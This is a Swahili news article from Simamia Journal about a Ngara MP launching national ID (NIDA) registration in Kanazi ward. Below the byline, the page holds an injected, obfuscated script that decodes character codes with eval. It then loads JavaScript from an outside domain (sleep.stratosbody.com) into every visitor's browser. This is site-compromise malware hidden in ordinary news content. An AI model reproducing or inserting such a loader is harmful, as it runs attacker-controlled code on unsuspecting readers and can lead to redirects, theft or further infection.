Recent Comments

MBUNGE WA JIMBO LA NGARA AREJESHA FURAHA KWA WANANCHI, VITAMBURISHO VYA TAIFA.

By Simamia Journal Dec 5, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Wananchi wa Kanazi wakisubiri Maelekezo juu ya Upatikanaji wa Vitamburisho vya NIDA

“Hii ni Faraja Kwetu” Ndivyo wanavyosema wananchi wa kata ya Kanazi wilayani Ngara baada ya kuzinduliwa kwa zoezi la Uhakiki na Uandikishwaji wa taarifa za Waombaji wa Vitamburisho vya Taifa NIDA.

Zoezi hilo limezinduliwa 04/12/2020 katika Kijiji cha Kanazi,Kata ya Kanazi Tarafa ya Kanazi ikiwa ni siku chache baada ya Uchaguzi mkuu uliofanyika Oktoba 28 mwaka huu ambapo Mbunge wa Jimbo la Ngara Mh. Ndaisaba George Ruhoro kupitia Kampeni zake aliahidi kupeleka Ombi Serikalini ili Mamlaka ya vitamburisho vya Taifa NIDA zisogezwe vijijini

Awali, iliwalazimu wananchi kusafiri umbali mrefu kutoka wanaoishi kwenda mamlaka ya mji wa Ngara kwaajili ya kufuata huduma hizo

Kutokana na hali hiyo,Umati mkubwa wa wananchi waliohudhuria zoezi la Uzinduzi wameelezea kufurahia,na kufarijika zaidi kwakuwa wataokoa gharama walizokuwa wakitumia kusafiri umbali mrefu,hasa kwa wale wanaoishi vijiji na kata za mbali kutoka mjini.

Disemba 3, mwaka huu (Alhamisi) mchana, wakati Mheshimiwa Ndaisaba George Ruhoro akiwa katika ziara ya kutembelea na kuzungumza na wananchi katika kata za Kanazi,Mugoma na Kirushya aliwaambia Wananchi kuwa alichaguliwa kwaajili ya kuwatumikia wananchi,na hatua hiyo ya kusogeza huduma za NIDA ni sehemu ya uwajibikaji wake

“Upatikanaji wa Vitamburisho vya Taifa imekuwa chamoto kubwa kwa wananchi jimboni humu,niliahidi kuitatua na sasa nimeanza rasmi”alisema Ndaisaba.

Ofisi ya Mbunge,Jimbo la Ngara.

 

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv